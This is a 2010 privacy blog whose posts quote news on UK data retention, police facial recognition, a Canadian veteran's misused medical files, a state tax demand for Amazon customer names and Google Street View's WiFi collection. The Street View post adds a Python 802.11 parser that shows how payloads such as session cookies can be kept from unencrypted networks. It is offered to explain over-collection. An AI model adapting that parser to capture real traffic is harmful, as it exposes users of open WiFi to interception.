Friday, October 29, 2010

U.K. Security Agencies Want Internet Service Providers To Routinely Store ALL User Email And Web Activities For 1 Year (Does This Sound Like Freedom?)


"A massive [U.K.] government database holding details of every phone call, e-mail and time spent on the internet by the public is being planned as part of the fight against crime and terrorism. Internet service providers (ISPs) and telecoms companies would hand over the records to the Home Office under plans put forward by officials"

"The information would be held for at least 12 months and the police and security services would be able to access it..."

"Industry sources gave warning that a single database would be at greater risk of attack and abuse.

Jonathan Bamford, the assistant Information Commissioner, said: “This would give us serious concerns and may well be a step too far. We are not aware of any justification for the State to hold every UK citizen’s phone and internet records. We have real doubts that such a measure can be justified, or is proportionate or desirable. We have warned before that we are sleepwalking into a surveillance society. Holding large collections of data is always risky - the more data that is collected and stored, the bigger the problem when the data is lost, traded or stolen.” "

The Times - ‘Big Brother’ database for phones and e-mails

----

This plan was previously put on hold because of implementation difficulties and resistance. The above article is from 2008. The plan has been brought back... [James]

----

"[Information Commissioner's Office] ICO objects to government data retention plans
Watchdog questions need to store emails and internet history for a year

The government's plans to store UK citizens' emails and internet history have been criticised by the Information Commissioner as going too far.

The Strategic Defence and Security Review, published last week, includes plans to force ISPs, and potentially all companies, to store email and internet data for at least one year." - 26 Oct 2010

V3.co.uk - ICO objects to government data retention plans

----

"A resurrected plan to force internet service providers (ISPs) to store their customers’ personal internet browsing habits has been called “disproportionate” by the Information Commissioner’s Office (ICO).

Despite the coalition government promising to outlaw the retention of internet and email records stored without good reason, the recent Strategic Defence and Security Review said that the former Labour government’s project would be revived.

ISPs and mobile operators already record, and retain for six months, email header information and web access details such as log-on/off times, IP address and details of dial-up numbers. Under the new regulations, this data would be supplemented with web activity logs, currently held for four days, and the complete data set would then be stored for a year."

IT Pro - Official privacy watchdog calls the former Labour plan “disproportionate”

----

"In the July 2009 response, the ICO said that the value communications data has for crime prevention and detection was not justification enough for "mandating" the collection of all possible communications data on subscribers by communications services providers (CSPs)."

publicservice.co.uk - Internet data project has 'privacy risks'

----

"President of the United States (and former General of the Army) Dwight D. Eisenhower used the term in his Farewell Address to the Nation on January 17, 1961:
'A vital element in keeping the peace is our military establishment. Our arms must be mighty, ready for instant action, so that no potential aggressor may be tempted to risk his own destruction...

This conjunction of an immense military establishment and a large arms industry is new in the American experience. The total influence — economic, political, even spiritual — is felt in every city, every statehouse, every office of the federal government. We recognize the imperative need for this development. Yet we must not fail to comprehend its grave implications. Our toil, resources and livelihood are all involved; so is the very structure of our society. In the councils of government, we must guard against the acquisition of unwarranted influence, whether sought or unsought, by the military-industrial complex. The potential for the disastrous rise of misplaced power exists and will persist. We must never let the weight of this combination endanger our liberties or democratic processes. We should take nothing for granted. Only an alert and knowledgeable citizenry can compel the proper meshing of the huge industrial and military machinery of defense with our peaceful methods and goals so that security and liberty may prosper together.'
- Dwight D. Eisenhower

In the penultimate draft of the address, Eisenhower initially used the term military-industrial-congressional complex, and thus indicated the essential role that the United States Congress plays in the propagation of the military industry. But, it is said, the president chose to strike the word congressional in order to placate members of the legislative branch of the federal government" - Wikipedia


----

It has been said that the "Military Industrial Complex" has been replaced by the "National Security Apparatus".

I will quote "Jonathan Bamford, the assistant Information Commissioner" again "We have warned before that we are sleepwalking into a surveillance society."

"...sleepwalking into a surveillance society."

"...warned..."

"...sleepwalking into a surveillance society."

"...warned..."

"...sleepwalking into a surveillance society."

----

"It is easy to use George Orwell’s 1984 as a comparative reference to where society is at now, but the novel is surely as important as it ever has been.

The modern classic presaged a dystopian society where people were deprived of privacy and, as a ruling body, the Party watched every move citizens made through its Big Brother mechanism.

While Orwell was onto something, however, his prediction (if it indeed was one) of an omnipotent, omniscient, singular controlling body was not exactly spot on.

In today’s Western world the central powers – aka each nation’s government – are not the only ones watching over us, gathering our data and making use of it.

Instead, there are now an abundance of organisations mining personal information to ascertain what people are doing, and even to predict what they will do next.

Given the sheer proliferation of data available over the web and the huge range of sources, companies do not have a particularly arduous task in gathering our information these days.

And whilst in 1984 the Party was the dominant force of one state, Oceania, these companies are global and able to gather people’s data regardless of location.

So, a question: Are we now living in the updated version of the Orwellian Nightmare?"

IT Pro - The Orwellian Nightmare: Version 2.0

----

Picture credit: Shepard Fairey in London: Big Brother Is Watching YOU

Shepard Fairey

http://obeygiant.com/

Thursday, October 28, 2010

"Police Facial Recognition: There's an App for That"


"US cops are employing Apple's iPhone to help identify potential criminals.

The system, known as MORIS (Mobile Offender Recognition and Identification System), lets police officers take a snap of a suspect and upload it to a secure network to be analysed.

If a biometric match is found, the identity, photo and background information of any suspect is transmitted back to the police officer's iPhone reports the Daily Mail newspaper.

Currently being tested by the gang unit at Brockton police in Massachusetts, the iPhone app is expected to be rolled out across 28 police departments and 14 sheriff departments in the state."

PC World - Police Facial Recognition: There's an App for That

----
"With the snap of an iPhone camera, one police department is identifying suspects on the go.

Using an app called MORIS (Mobile Offender Recognition and Identification System), the police department in Brockton, Massachusetts is matching photos of suspects with a database in development by statewide sheriff’s departments.

Sean Mullin, president and CEO of BI2 Technologies of Plymouth who developed the app, explained that the app allows officers to identify suspects through facial recognition, iris biometrics and fingerprints – all on one device.

MORIS may be a quick, easy way to ID perps, but it isn’t cheap. Each iPhone loaded up with the app costs $3,000. These aren’t regular, off-the-shelf iPhones but augmented devices (considerably bulkier than what you’d find in a store and what could easily fit in a pocket) with super-sized batteries as well as some extra hardware.

During the testing phase, police have access to the facial recognition software but the system will later include both iris and fingerprint recognition. Brockton is using a federal grant to pay for the experimental program.

The first devices will be used by the gang unit until more grant money can be obtained to equip the rest of the force. In total, about $150,000 in grant money will be used in 28 police departments and 14 sheriffs departments across the state.

Police Chief William Conlan explained the advantages in a video interview,”This is something that the officers can actually access when they’re out on the road, so they don’t have to bring somebody back here to figure out who they are.”"

Cult of Mac - Police use Facial Recognition iPhone App to ID Perps

----
"New tests conducted by police yet again prove an increasing number of surveillance systems are unreliable.

200 people were enrolled to test CCTV face recognition software on three systems which failed to recognise 8 out of 10 people, even when the system was fed images of people standing still – one of the easiest settings often used to suggest the software is reliable.

The tests were conducted on software produced by Cognitec, Bosch and Cross Match.

The federal police in Germany who conducted the test are citing “bad lighting” as the reason for the failure..."

"Through the use of number plate recognition, cars fitted with mandatory RFID, schools fingerprinting, biometric passports, a European biometric database and ‘Spy Drones’ monitoring street activity, we see not only Big Brother nations emerging but the creation of an entire European Big Brother continent where all movements can be tracked and recorded."


RINF Alternative News - [German] Police Report: Face Recognition CCTV Unreliable

----

I'm torn on this one. I am hip to giving police the ability to check against a database from the scene or from the street, especially in the uses described in the article - a gang task force. The positive that I do see is that police will be less likely to haul someone down to the police station in a case of mistaken identity, especially if dealing with racial differences - the stereotyped "all black people look alike" kind of moment (which applies to characteristic recognition across other racial groups).

(I recall when the movie Colors came out in 1988 and there was some discussion in the media of the role police played in non-white communities. The words used were "white occupational army". This was about the time that police forces all over North America were beginning to look at diversity issues in their ranks)

Where I live we have a large First Nations population. I know a few Indian folks who got hauled in for "further checking" because they had a resemblance to someone the police were looking for. Hopefully an app like this one will help prevent such events from occurring in the future.

On the other hand...

I have some concern about widespread use of this kind of technology on other photo databases. It won't be long before security agencies are using this to comb facebook (if they aren't already) and the web for people they are looking for. I am uncomfortable with the kind of "associative" databases that could be created from that kind of picture crawling.

I have friends who fled Chile and other central and South American countries during the various dictatorships. They told me there were many arrests and interrogations by association. Even just the neighbours of such dangerous people as trade union or human rights activists.

Which means if a coup or authoritarian regime arrives here we will all be among the first to be arrested, tortured and shot (or thrown into the ocean from helicopters). I'm not predicting anything, but hey - what happens if President Palin doesn't like a spanking new NDP/Green coalition government...

And if you don't think bad things can happen here, look at my last post on facial recognition and the G20. Think about the arrests and harassment of Quebec separatists and nationalists during the FLQ crisis. Look at the number of people detained and tortured by the United States during their current conflicts - the number that were detained with no real grounds.

Try this on for size:

"A week after the Justice Department released documents that described in extraordinary detail the CIA's top secret rendition program, an international human rights tribunal has agreed to take up the case of a German citizen who was "rendered" to a CIA black site prison in Afghanistan and tortured in a case of mistaken identity.

The American Civil Liberties Union filed a petition in April with the Inter-American Commission on Human Rights (IACHR) on behalf of Khaled El-Masri, a truck driver, detained for four months. El-Masri was first detained in December 2003 in Macedonia by law enforcement authorities of that country for 23 days before being turned over to the CIA.

El-Masri was beaten, stripped and drugged prior to being loaded onto a plane bound for Afghanistan, according to the petition. After several interrogation sessions at the black site prison, the CIA realized they had captured the wrong person. In May 2004, the CIA blindfolded El-Masri, put him on a plane and abandoned him on a hillside in Albania. He was never charged with a crime."


Antimedius - International Tribunal Takes Up Rendition, Torture Case

'nuff said on that subject

----

On to another topic, related to facial recognition. How long before we have "body recognition"? And what will happen when people start using a combination of body recognition and facial recognition on all those amateur porn sites where people upload their own pictures? Think Manitoba judges and such for the awesome results of being outed in relation to amateur porn and jilted exes tossing nudie pics on the internet.

It's a brave new world...

----

Picture credit: Cult of Mac - Police use Facial Recognition iPhone App to ID Perps

Wednesday, October 27, 2010

Sean Bruyea's Battle With Veterans Affairs Is A Stark Reminder Of Why Privacy Is An Issue For All Of Us

"OTTAWA – An outspoken veterans' advocate and Gulf War vet says the federal government tried to hospitalize him after he began speaking out against government policies."
----
"Bruyea had complained after discovering through Access to Information that his file had been accessed 4,131 times over 10 years by more than 600 department officials."
----
"Sean Bruyea told CTV’s Question Period that two months after he first testified against a controversial change to veterans’ disability payments, Veterans Affairs Canada attempted to discredit him by hospitalizing him and making his advocacy a psychological issue.

“Within two months of that period, they tried to force me to go to their hospital for a psychiatric assessment that they had never asked for before.

Why within two months of my advocacy, did they require that assessment?” Bruyea said.

“You are saying they were trying to hospitalize you?” asked CTV’s Craig Oliver.

“Well, exactly. I was terrified. As an intelligence officer who studied Soviet Russia, I mean I knew about the Gulags in Stalinist Russia, and I thought: 'This isn’t much different. They are trying to make my advocacy a psychological issue'.”

Bruyea said within days of his testimony against lump-sum disability payments, veterans affairs also denied him approval for treatment he had been receiving for his post-traumatic stress disorder, such as meetings with his psychologist and a couple’s therapist.

Privacy Commissioner Jennifer Stoddart found Thursday there had been grave breaches of Bruyea’s personal information at the department and ordered a full audit."

Toronto Sun - Vet alleges government tried to hospitalize him

----
"Until Ms. Stoddart ruled on Oct. 7 that the Veterans Affairs Department violated the Privacy Act by disclosing personal and medical information to bureaucrats and Cabinet ministers who had no right to the files, the government had delayed a legal response to the statement of claim for damages Mr. Bruyea filed last March 2, the court file shows. Normally, a notice of defence to the legal action would have been required at the latest within 30 days, but the government held it off until Sept. 22.

Ms. Stoddart launched her investigation after Mr. Bruyea discovered under the Access to Information Act how widely the department had circulated his medical files as an injured veteran within the department and to former veterans affairs ministers Greg Thompson, a Conservative, and Albina Guarnieri, the previous Liberal veterans affairs minister. Ms. Guarnieri notes Ms. Stoddart referred to the briefing notes she received as "appropriate" because they concerned issues Mr. Bruyea raised.

The privacy commissioner also confirmed Mr. Bruyea's complaint that departmental officials had used his medical condition, post traumatic stress disorder, in an attempt to discredit his work as a veterans advocate opposing a new Veterans Charter. Mr. Bruyea opposed in particular a $275,000 lump-sum cash payment for severely injured veterans, that had been initially brought in under Ms. Guarnieri and implemented by Prime Minister Stephen Harper's (Calgary Southwest, Alta.) government.

Ms. Stoddart said a departmental briefing note to former Conservative veterans minister Greg Thompson in March 2006 contained references to Mr. Bruyea's advocacy activities as well as "considerable sensitive medical information, including diagnosis, symptoms, prognosis, chronology of interactions with the department as a client, amounts of financial benefits received, frequency of appointments and recommended treatment paths." "


The Hill Times Online - Bruyea's lawsuit against feds could be settled out of court, says lawyer

----

And Sean Bruyea's own words:
"As I testified to this committee last month, I was and am the victim of reprisals by Veterans Affairs officials precisely because of my opposition to the New Veterans Charter as well as my support of a veterans’ ombudsman. The New Veterans Charter cannot be looked at in isolation from the process in which it was created. We cannot as a nation or a parliament blindly accept that any means justify the end. The secretive and bullying manner in which the New Veterans Charter was fast tracked prevented due process of Committee review, a review we called for exactly five years ago today and which you are now thankfully carrying out.

Perhaps if Parliament had held public hearings prior to tabling the New Veterans Charter, Veterans Affairs officials such as Darragh Mogan, the chief architect of the NVC, would not have acted with such impunity on March 24 2006 when he told six VAC senior managers including Assistant Deputy Minister Brian Ferguson that it was “time to take the gloves off” when dealing with me and my public analysis of the New Veterans Charter. [bold mine - James]

It is not just a little alarming that the plan detailing what Mr. Mogan carried out with his “gloves off” was sent to two Canadian Forces officers and then later blanked out by Access to Information. It can’t be a coincidence but later that afternoon, Ken Miller circulated a letter to Assistant Deputy Minister Brian Ferguson, Darragh Mogan and others which I wrote to Prime Minister Harper regarding the Charter and which had bold letters written above: “Not for Departmental Viewing.” Thirty-six minutes later, instructions from Assistant Deputy Minister Brian Ferguson that my personal medical files be shared with Parliamentary Secretary Betty Hinton were put into action, just three days after Minister Thompson saw those same files.

I can only assume that this was done to undermine her confidence in me, because her office doesn’t look like a medical office to me and neither Mr. Mogan nor Mr. Ferguson appear to have M.D. or medical doctor designation following their names. More curiously, Parliamentary Secretary Betty Hinton’s support of me quickly declined after receiving the skewed medical information provided by the Department, and I don’t think that’s a fair or ethical use of my personal information. But I may not be alone here; the Privacy Commissioner is investigating the matter.

I wasn’t dreaming when 13,000 pages of Privacy Act information showed me how VAC had used my personal medical files, to slander my reputation with Ministers, Members of Parliament and Senior VAC managers thereby undermining my effectiveness as an advocate for the overhaul of the New Veterans Charter. Nor was I delusional when those same documents showed how VAC bureaucrats – not medical doctors – had determined that I was “clearly unwell”, in need of a “one-week” or more inpatient psychiatric assessment, simply because I demanded a Parliamentary review of the New Veterans Charter. [bold mine - James]

While it is true that I suffer from PTSD and have a therapeutic medical team which strongly opposed the need for this assessment, the mere fact that one disagrees with VAC officials is not, in itself, a diagnosis for such draconian measures or for any other treatment. If disagreement with VAC officials were a diagnosis for treatment, many members of this committee would already be racking up rather large therapy bills.

The fact that VAC officials would target an opponent in such a devious way, is precisely why a “Comprehensive Whistleblower Veteran and Family Protection” legislation must be included in any rewrite of the New Veterans Charter to show veterans that they are equal partners in overseeing the programs created in their name and in honour of their sacrifices."

fairwhistleblower.ca - Sean Bruyea testifies on Veterans Charter (Part 2)

----

Search google news for more on this horror story

Google news search - Sean Bruyea

Google search - Sean Bruyea

Sean Bruyea's website

Media Quote List - Sean Bruyea

----

This is the sort of reprisal that can occur when anyone challenges those with power and authority. It happens when people challenge private corporations and it happens when people challenge politicians/government or its bureaucrats.

It happens in schools - remember my post about the remotely activated webcams on the school issued laptops? The student who received the largest part of the settlement for being spied on remotely by school administration officials was targeted because he was considered a troublemaker for the school administration.

A couple of decades ago I got suddenly paid out by an employer when I started to organise a union in my workplace (I had submitted my resignation effective some 6 months in the future because I was going to university in the fall of that year) prompted by some awful safety violations and tolerance of sexual harassment in the workplace. My co-workers told me that other union friendly people had been fired for contrived reasons in the past in this particular location of the large multi-national I worked for (no, I am not referring to Wal-Mart).

Information is a weapon. People having access to your information can arm them. There are times when people will try to harm you in one way or another. Sean Bruyea is a case in point.

----

Picture Credit: fairwhistleblower.ca - Sean Bruyea testifies on Veterans Charter (Part 2)

Tuesday, October 26, 2010

North Carolina Tax Dept. Wanted All Names, Purchases, & Titles Of N.C. Amazon Purchasers; Judge Says no way!

"Some clever lawyering turned a routine Internet tax battle into a First Amendment case, as a federal judge in Washington rebuffed North Carolina’s efforts to get its hands on Amazon.com customer data.

Amazon’s lawyers, joined by the American Civil Liberties Union, argued that the North Carolina Department of Revenue threatened the constitutional rights of Amazon customers when it requested the names of North Carolina customers on top of detailed purchase information it had already obtained.

In a 26-page ruling , U.S. District Judge Marsha Pechman found the North Carolina revenooers’ request was too broad and subjected Amazon customers to unconstitutional scrutiny.

As the declarations from the Intervenors make clear, the fear of disclosure of their reading, watching, and listening habits poses an imminent threat of harm and chill to the exercise of First Amendment rights."

Forbes - Federal Judge Quashes N.C. Search For Amazon Customer Data

----

"“The Amazon customers we represent — indeed, anyone who’s purchased books, movies or any other legal thing online — should be able to make purchases freely without the government looking over their shoulder. We hope the court agrees.”

— The court did agree with the ACLU in this case, when U.S. District Judge Marsha Pechman in Washington state ruled yesterday that Amazon.com does not have to turn over the names and addresses of North Carolina residents who made purchases on the website from 2003 to 2010, as requested by that state’s use-tax collectors. Use taxes are collected on, among other things, purchases made online from merchants with no presence in the consumer’s state. CNet reports that Amazon had already provided North Carolina officials with purchases made by ZIP code, but that state officials wanted names and purchases linked together, a request that Pechman said “runs afoul of the First Amendment.” The court did not grant the broader injunction the ACLU, which had intervened in this case, had sought, which would have barred Amazon.com from revealing customer data without a subpoena."

Good Morning Silicon Valley - Quoted: Amazon wins round in privacy fight

----

"North Carolina's Department of Revenue violated the First Amendment in asking Amazon for names of customers who bought books, a Washington judge ruled on Monday.

The ruling is a win for free speech advocates, but the ACLU may continue to pursue the issue because the ruling may not prevent similar requests for broad customer data in the future.

The lawsuit has its roots in a dispute over whether Amazon must pay sales tax on goods shipped to North Carolina residents. As part of its investigations into the issue, North Carolina asked Amazon to send it "all information for all sales" to customers in the state.

Amazon complied by sending specific information, including book titles, about products shipped to North Carolina. The trouble started when North Carolina then asked for the names and addresses of customers. Amazon subsequently asked the court to rule that sending customer names to North Carolina violates the customers' First Amendment rights because the state would then be able to match people's names with specific book titles."

PC World - Court Rules Amazon Doesn't Have to Turn Over Customer Names

----

Once that sort of data is in one set of hands, how long does it take for other agencies to request it?

How long before Amazon purchases are tied into "terrorist" searches and profiling?

How long before such scrutiny wanders into thought police land? Think of the various school districts in the U.S. that have elected boards that censor library and textbook picks.

If you don't believe me, I can provide examples of preemptive enquiries on all variety of activities by police and security agencies all over the world.

As a guy who gets extra searched going through airports because he looks kind of Lebanese in person, especially when I have a tan, I can tell you that profiling and jumping to conclusions is rampant among officialdom. For the record, I am of Ukrainian ethnic descent and my Hutzul genotype has strong central Asian characteristics - my family has been in Canada for over 100 years. But I still get busted for looking like a "foreign" terrorist...

Just sayin'

Look to where information requests can end up sometime in the future. Because by the time you realise it, your freedom will be curtailed - and people really will be watching you.

----

Picture credit: computing.co.uk - Data privacy and the surveillance state

Thursday, October 21, 2010

Google Street View Scanned And Collected Data Streams From WiFi Nodes; Canadian Privacy Commissioner Not Impressed; Google Stops Doing It

"The Canadian government concluded today that Google's collection of fragments of Wi-Fi transmissions violated the law, but also said that the recording was the "result of a careless error" and was not intentional.

Jennifer Stoddart, Canada's privacy commissioner, said she would consider the investigation closed and the matter resolved as long as Google revises its internal procedures to improve "the privacy training it provides all its employees" and deletes or segregates any data relating to Canadian citizens.

In e-mail to CNET, a Google spokesman said the company is working with the privacy commissioner: "As we have said before, we are profoundly sorry for having mistakenly collected payload data from unencrypted networks. As soon as we realized what had happened, we stopped collecting all Wi-Fi data from our Street View cars and immediately informed the authorities."

Stoddart's report sheds a bit more light on what led to the erroneous collection of about 12 Blu-ray discs' worth of Wi-Fi transmissions worldwide. She said that her investigation revealed that an unnamed Google engineer failed to follow company procedures by not sending design specifications for Street View code to the company's legal department for review"

CNET - Canada slaps Google for Street View Wi-Fi intercepts

----
"Google’s roaming Street View cameras have been doing more than snap pics of your neighborhood; they’ve also been collecting packets of information sent over private WiFi networks, the company acknowledged Friday.

The company said the collection was “a mistake,” the result of a programming error, and that it has now stopped collecting the data, according to a post on its blog.

But the revelation raises questions about whether the company violated federal wiretapping laws in collecting the information and could draw scrutiny from U.S. regulators.

Last month, regulators with the Data Protection Authority in Germany asked the search giant what information its Street View cameras collected and what it did with that information."

Wired Magazine - Google Street View Cams Collected Private Content From WiFi Networks

----

"Preliminary Letter of Findings
Complaints under the Personal Information Protection and Electronic Documents Act (the Act)

1. The Office of the Privacy Commissioner of Canada initiated three complaints against Google Inc. (Google) on May 31, 2010, pursuant to subsection 11(2) of the Act, after being made aware that Google Street View cars had been collecting payload data from unencrypted WiFi networks during their collection of publicly broadcast WiFi signals (service set identifier [SSID] information and Media Access Control (“MAC”) addresses).

2. The three complaints are as follows:
   1. Google’s collection, use or disclosure of payload data was done without the individual's prior knowledge and consent;
   2. Google’s collection of payload data was done without prior identification of the purposes for which personal information (PI) was collected;
   3. Google’s collection of payload data was not limited to that which was necessary for the purposes identified."

Office of the Privacy Commissioner of Canada - Preliminary Letter of Findings; Complaints under the Personal Information Protection and Electronic Documents Act (the Act)
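
The Commissioner's letter draws a line between the publicly broadcast identifiers a WiFi survey legitimately needs (SSID and MAC address, carried in beacon frames) and the payload of data frames on unencrypted networks, which a geolocation database has no use for. As an added example (not Google's code, and not from any of the texts quoted above), the following minimal 802.11 frame parser shows both a survey that writes every decoded frame to its log, payload included, and one that keeps only the beacon fields. The frames are constructed inline rather than captured from the air; the MAC addresses, SSIDs and HTTP payload are invented. Encryption is inferred the way a passive sniffer can see it: the "privacy" capability bit in a beacon and the "protected frame" flag in a data frame's frame-control field.

```python
import struct

# 802.11 frame-control constants (IEEE 802.11 MAC header, little-endian fields)
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_BEACON = 8
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40
CAP_PRIVACY = 0x0010          # beacon capability bit: network uses WEP/WPA/WPA2
IE_SSID = 0                   # information-element tag carrying the SSID
HDR_LEN = 24                  # non-QoS header: fc(2) dur(2) addr1-3(18) seq(2)


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(raw):
    """Decode only the fields a wardriving survey needs from one raw frame."""
    fc0, fc1 = raw[0], raw[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    a1, a2, a3 = raw[4:10], raw[10:16], raw[16:22]
    body = raw[HDR_LEN:]
    if ftype == TYPE_MGMT and subtype == SUBTYPE_BEACON:
        _ts, _interval, cap = struct.unpack_from("<QHH", body, 0)
        ssid, off = None, 12
        while off + 2 <= len(body):            # walk the tagged information elements
            tag, ln = body[off], body[off + 1]
            if tag == IE_SSID:
                ssid = body[off + 2:off + 2 + ln].decode("utf-8", "replace")
            off += 2 + ln
        return {"kind": "beacon", "bssid": mac_str(a3), "ssid": ssid,
                "encrypted": bool(cap & CAP_PRIVACY)}
    if ftype == TYPE_DATA:
        to_ds, from_ds = fc1 & FLAG_TO_DS, fc1 & FLAG_FROM_DS
        # which address slot holds the BSSID depends on the ToDS/FromDS bits
        bssid = a2 if (from_ds and not to_ds) else a1 if (to_ds and not from_ds) else a3
        return {"kind": "data", "bssid": mac_str(bssid),
                "protected": bool(fc1 & FLAG_PROTECTED), "payload": body}
    return {"kind": "other"}


def survey_overcollecting(frames):
    """Logs every decoded frame, payload included: the over-collection described above."""
    log = [parse_frame(f) for f in frames]
    return {"access_points": {r["bssid"]: r["ssid"] for r in log if r["kind"] == "beacon"},
            "captured_payloads": [r["payload"] for r in log
                                  if r["kind"] == "data" and not r["protected"]]}


def survey_minimal(frames):
    """Keeps only what geolocation needs (BSSID, SSID, encryption flag); data frames are counted, never stored."""
    aps, dropped = {}, 0
    for r in map(parse_frame, frames):
        if r["kind"] == "beacon":
            aps[r["bssid"]] = {"ssid": r["ssid"], "encrypted": r["encrypted"]}
        elif r["kind"] == "data":
            dropped += 1               # payload is never retained, let alone written to disk
    return {"access_points": aps, "data_frames_dropped": dropped}


# --- constructed sample frames (invented addresses and content, not a real capture) ---
def beacon(bssid, ssid, encrypted):
    fc = bytes([TYPE_MGMT << 2 | SUBTYPE_BEACON << 4, 0])
    hdr = fc + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    cap = CAP_PRIVACY if encrypted else 0
    body = struct.pack("<QHH", 0, 100, cap) + bytes([IE_SSID, len(ssid)]) + ssid.encode()
    return hdr + body


def data_from_ap(bssid, client, payload, protected):
    fc = bytes([TYPE_DATA << 2, FLAG_FROM_DS | (FLAG_PROTECTED if protected else 0)])
    hdr = fc + b"\x00\x00" + client + bssid + b"\x02" * 6 + b"\x00\x00"   # FromDS: addr1=DA, addr2=BSSID
    return hdr + payload


CAFE, HOME, CLIENT = b"\x00\x11\x22\x33\x44\x55", b"\x66\x77\x88\x99\xaa\xbb", b"\xcc\xdd\xee\x01\x02\x03"
SAMPLE_FRAMES = [
    beacon(CAFE, "CafeFreeWiFi", encrypted=False),
    beacon(HOME, "HomeNet", encrypted=True),
    data_from_ap(CAFE, CLIENT, b"GET /mail/inbox HTTP/1.1\r\nCookie: session=abc123\r\n", protected=False),
    data_from_ap(HOME, CLIENT, b"\x5a\x3c\x00\x20\x00\x00\x00\x00\x9f\x11\x04\x7e", protected=True),
]

if __name__ == "__main__":
    print(survey_overcollecting(SAMPLE_FRAMES))
    print(survey_minimal(SAMPLE_FRAMES))
```

The two surveys see identical radio traffic and produce the same access-point list; the only difference is whether data frames are ever retained. The encrypted network's traffic is opaque either way, which is why the open "CafeFreeWiFi" session cookie is the only thing the over-collecting version ends up holding, and why the commissioner's third complaint (collection not limited to what the purpose requires) is the one that matters for a geolocation survey.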


----

"(CNET) -- Google has no plans to resume using its Street View cars to collect information about the location of Wi-Fi networks, a practice that led to a flurry of privacy probes after the company said it unintentionally captured fragments of unencrypted data.

The disclosure appeared in a report on Street View released this week by Canadian privacy commissioner Jennifer Stoddart, who said that "collection is discontinued and Google has no plans to resume it." Assembling an extensive list of the location of Wi-Fi access points can aid in geolocation, especially in areas where connections to cell towers are unreliable.

Instead, Stoddart said that, based on her conversations with headquarters in Mountain View, Ca., "Google intends to obtain the information needed to populate its location-based services database" from "users' handsets."

That, at least, should come as no surprise. As CNET reported in June, mobile phone and laptop users who run certain Google applications already share their location information with the company, which then uses this crowdsourced data to refine its mapping capabilities.

When Google Maps Navigation users request a location fix with the "use wireless networks" option checked in their settings, their device sends over a list of all nearby addresses associated with wireless hot spots, which can in turn be checked against Google's existing database of those addresses gathered through the Street View project."

CNN - Google ditches Street View Wi-Fi scanning

----

Picture Credit: Wired Magazine - Google Street View Cams Collected Private Content From WiFi Networks

Wednesday, October 20, 2010

"Study: At Age 2, 81 percent of Kids have 'Digital Footprint'"

I was going to put up a picture of a sonogram of a baby, but all the pictures on google images seemed to be someone sharing their child's sonogram with friends and family on personal blogs and it just didn't seem right to me to intrude on their space...

----

"Do you have Facebook friends who share pictures of their babies – from sonograms to their infants’ births, baptisms and other baby-related content? Or those who create an online account for their babies, long before these babies can even see clearly?

These babies clearly have an online presence at a very early age. And it’s not surprising. With people easily using media to share information with others, sharing their babies’ information may sound harmless.

According to a study conducted by Research Now, 92 percent of all American babies have some form of online presence by the time they reach the age of two. It also revealed that children as young as six months have an online presence, including their own e-mail addresses."


Manila Bulletin - Study: At Age 2, 81 percent of Kids have 'Digital Footprint'

----

"Canadian moms seem to have few qualms about the privacy risks of putting family photos on the Internet, according to a new study.

Out of 10 regions surveyed by software maker AVG, Canadian mothers were also the most likely to post scans of their prenatal sonograms online.

The study, which surveyed 2,200 mothers in Canada, the U.S., the U.K., Australia, France, Germany, Italy, Japan, New Zealand and Spain, suggests 81 per cent of today's kids have some kind of online presence before they turn two."


The Daily Gleaner - Canadian moms most likely to upload sonogram online: report

----
"According to a study released last week by AVG, an average of 81 per cent of toddlers in 10 Western countries has a digital presence; 92 per cent in the United States, followed by 91 per cent in New Zealand and 84 per cent in Australia and Canada. A third of children are online at just a few weeks of age, while a quarter appear on the web before they are born in the form of ante-natal scans.

"It's a sobering thought," said AVG managing director Peter Cameron in a statement. "The vast majority of children today have online presence by the time they are two years old -- a presence that will be built on throughout their whole lives.""


Ottawa Citizen - Kids' online presence raises security worries

----

The best advice I have heard on photos and personal information online goes something like this:

It's not going away. Your online footprint will be there forever. Manage it. Make sure that the first thing that comes up is not those embarrassing pictures of you sucking a face mounted Reindeer nose dildo (real story [not me]), or mooning your boss at a Christmas party (real story [not me]), or running naked through a football stadium (real story [not me]). Rand Paul and Aqua Buddha get no mention here because it wasn't an online photo leak...

You have an online presence whether you like it or not. Ensure the top searches about you are what you want them to be.

"...keep the BlackBerry device at least 0.98 in. (25 mm) from your body (including the abdomen of pregnant women and the lower abdomen of teenagers)"

"To maintain compliance with FCC, IC, MIC, and EU RF exposure guidelines when you carry the BlackBerry device on your body, use only accessories equipped with an integrated belt clip that are supplied or approved by Research In Motion (RIM). Use of accessories that are not expressly approved by RIM might violate FCC, IC, and EU RF exposure guidelines and might void any warranty applicable to the BlackBerry device. If you do not use a bodyworn accessory equipped with an integrated belt clip supplied or approved by RIM when you carry the BlackBerry device, keep the BlackBerry device at least 0.98 in. (25 mm) from your body when the BlackBerry device is transmitting..."

"To reduce radio frequency (RF) exposure consider these safety guidelines: . . . Use hands-free operation if it is available and keep the BlackBerry device at least 0.98 in. (25 mm) from your body (including the abdomen of pregnant women and the lower abdomen of teenagers) when the BlackBerry device is turned on and connected to the wireless network."


Time, Swampland Blog - BlackBerry: Keep Our Phones Away From Your Body

----

Picture Credit: Mobile Phones Reviews - Blackberry 9000 Bold Review

Tuesday, October 19, 2010

Cell Phone Only Households And Poll Result Accuracy


The latest estimates of telephone coverage by the National Center for Health Statistics found that a quarter of U.S. households have only a cell phone and cannot be reached by a landline telephone. Cell-only adults are demographically and politically different from those who live in landline households; as a result, election polls that rely only on landline samples may be biased. Although some survey organizations now include cell phones in their samples, many -- including virtually all of the automated polls -- do not include interviews with people on their cell phones. (For more on the impact of the growing cell-only population on survey research, see "Assessing the Cell Phone Challenge," May 20, 2010).

PewResearchCenter Publications - Cell Phones and Election Polls: An Update

----

Good article. The way that cell phone only households can skew polling reminds me of how Dewey vs Truman turned out. The election was very close. A few thousand votes would have changed the outcome. The polling that was done was biased toward those with telephones. In 1948 only more wealthy people had telephones. Rich people in 1948, just like now, are more likely to vote Republican. In 1948 huge swaths of the United States didn't have telephones. They were poorer and more likely to vote Democrat. They weren't polled, or were polled poorly (polling in areas with few telephones was done by door-knocking in "representative communities" [talk about sample bias issues...]).

